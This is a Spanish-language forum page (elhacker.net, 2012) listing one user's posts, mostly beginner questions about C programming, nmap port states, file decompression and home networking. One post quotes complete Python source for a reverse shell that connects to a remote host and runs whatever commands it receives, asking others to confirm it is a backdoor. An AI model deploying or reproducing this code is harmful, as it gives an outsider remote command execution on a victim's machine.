elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Temas
Páginas: [1] 2
1  Programación / Programación C/C++ / Duda con funciones en C. en: 23 Octubre 2012, 21:11 pm
Buenas!

Por mas que busco no encuentro el nombre de la funcion que cambia de letras a valores ASCII (A = 65 por ejemplo), alguien me podria hechar una mano?


Gracias!  ;D   
2  Programación / Desarrollo Web / Duda navegador y formato xml. en: 18 Septiembre 2012, 19:40 pm
Buenas a todos!

Nuestro profesor de fisica ha creado una plataforma virtual para que podamos colgar archivos, generalmente fichas para hacer y luego imprimirlas y esas cosas, cuando nos lo estaba exlicando nos dijo que habia que mandarle tus datos a su direccion de correo y el te registraba, bueno pues nos dijo que nuestros datos lo guardaramos como formato XML y se lo mandaramos con el navegador Internet explorer expresamente que si no, no era capaz de leerlo. Me preguntaba si habia alguna relacion entre el formato, navegador, datos etc...

Gracias! ;D
3  Foros Generales / Dudas Generales / Pc punto de venta en: 2 Septiembre 2012, 00:29 am
Buenas!


El otro dia estuve en una tienda y me cobraron con un tipo de ordenador lo cual es normal ya que esta implementado en muchas tiendas, pero, me salto la curiosidad de bueno algo de informacion en general, software, seguridad, algunas vulnaribilidades... y demas. He buscado en internet pero no viene casi nada y a ver si alguein sabia algo de esto aunque es un poco raro, dejo aqui una imagen que he encontrado para aclarar(tampoco he podido buscar mucho que estoy en el portatil con el usb de movistar y el internet no va muy bien....)



http://img.directindustry.es/images_di/photo-mg/ordenador-de-pantalla-tactil-para-punto-de-venta-18432-2432437.jpg

Gracias!  ;D
4  Informática / Software / Alternativa WinZip en: 15 Agosto 2012, 15:25 pm
Buenas!

Como el titulo dice necesito un programa para descomprimir archivos y el WinZip ya me ha caducado, he probado con el WinRar pero la mayoria de los archivos que se tenian que descomprimir con WinZip no me deja y dice que estan dañados. Me recomiendan algun otro programa para descomprimir, para windows 7.

Gracias! ;D
5  Seguridad Informática / Análisis y Diseño de Malware / Codigo fuente de un "Backdoor" en: 12 Agosto 2012, 15:51 pm
Buenas!

Encontre este codigo de un backdoor en un manual que tengo, que la verdad no se que hacia alli porque no era un manual de malware... pero bueno el caso es que no se si es un backdoor ya que no entiendo de python, tiene pinta de que si pero para salir de dudas lo posteo aqui, a ver si me podeis ayudar:

Código
  1. #!/usr/bin/python
  2. # imports here
  3. import socket,subprocess
  4. HOST = '172.16.32.137' # The remote host
  5. PORT = 443 # The same port as used by the server
  6. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  7. # connect to attacker machine
  8. s.connect((HOST, PORT))
  9. # send we are connected
  10. s.send('[*] Connection Established!')
  11. # start loop
  12. while 1:
  13. # recieve shell command
  14. data = s.recv(1024)
  15. # if its quit, then break out and close socket
  16. if data == "quit": break
  17. # do shell command
  18. proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  19. # read output
  20. stdout_value = proc.stdout.read() + proc.stderr.read()
  21. # send output to attacker
  22. s.send(stdout_value)
  23. # close socket
  24. s.close()

Gracias!
6  Seguridad Informática / Hacking / Duda Puertos en: 6 Agosto 2012, 23:04 pm
Buenas!

Estaba usando nmap y me sale que unos puertos tcp esta "filtered" y otros "open" que significan eso de filtered?

Gracias! ;D
7  Sistemas Operativos / Windows / Intentar conectar Windows y ubuntu en: 2 Agosto 2012, 15:54 pm
Buenas!

Tengo ubuntu 12.04 y windows 7 instalado en el mismo pc y queria saber si se podian conectar los dos, por ejemplo algo de archivos compartidos o habilitar examinar red en ubuntu o algo parecido. He buscado en internet pero no llego a entenderlo y no lo explican del todo bien, o que yo no lo entiendo, para no tener que, al pasarme cosas de uno a otro, usar el usb.
He visto lo de uso de carpetas publicas si lo habilito creo que si podre hacerlo pero tambien veran mis archivos compartidos las demas personas de la red?

Gracias! ;D
8  Comunicaciones / Redes / Problemas con red ad hoc en: 27 Julio 2012, 20:29 pm
Buenas!

Hace poco cree una red ad hoc para conectarnos entre nuestros amigos y le di a guardar red porque la utilizabamos con frecuencia pero ahora ya no la utilizamos tanto, ahora siempre que le doy a conectar a una red me sale y he intentado quitarla pero he podido, no es que me importe mucho que este ahi pero queria saber si se podia quitar.

Gracias! ;D
9  Programación / Programación C/C++ / Duda en C. en: 21 Julio 2012, 14:55 pm
Buenas!

Tengo el siguiente
Código:
#include <stdio.h>
main()
{
      int primerNumero;
      int segundoNumero;
      int suma;
      printf("Introduce el primer numero %d", primerNumero);
      scanf("%d", &primerNumero);
      printf("Introduce el segundo numero %d", segundoNumero);
      scanf("%d", &segundoNumero);
      suma = primerNumero + segundoNumero;
      printf("El numero sumado es %d",suma);
      getchar();
      }

Y me compila y ejecuta perfectamente pero al ejecutar me sale:

"Introduce el primer numero 1996135988"(Y ahora introducir el numero deseado)
"Introduce el segundo numero 2686792"(Y aquí el segundo numero)


Los numero que aparecen no afectan a la suma ni nada porque al sumar 5 +5 da 10, pero esos números, por que aparecen?

Gracias!  ;D
     
10  Programación / Programación C/C++ / Duda sobre C. en: 14 Julio 2012, 19:26 pm
Buenas!

Estoy empezando en esto de la programacion en C y tengo varias dudas, queria saber si me las podiais resolver.
Gracias!

A ver estoy intentando compilar y ejecutar este codigo:

Lo 1º las dos llaves "{}" al compilar me da error  :-\ .
Lo 2º otro programa al ejecutar me sale una ventana negra que no da tiempo ni a verla.

A ver si podéis hacer algo gracias.

Código:
#include <stdio.h>
#include <srting.h>
int main0
{
    char mensaje[20];
    strcpy (mensaje, "Atapuerca\n");
    printf (mensaje);
    return 0;
}
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines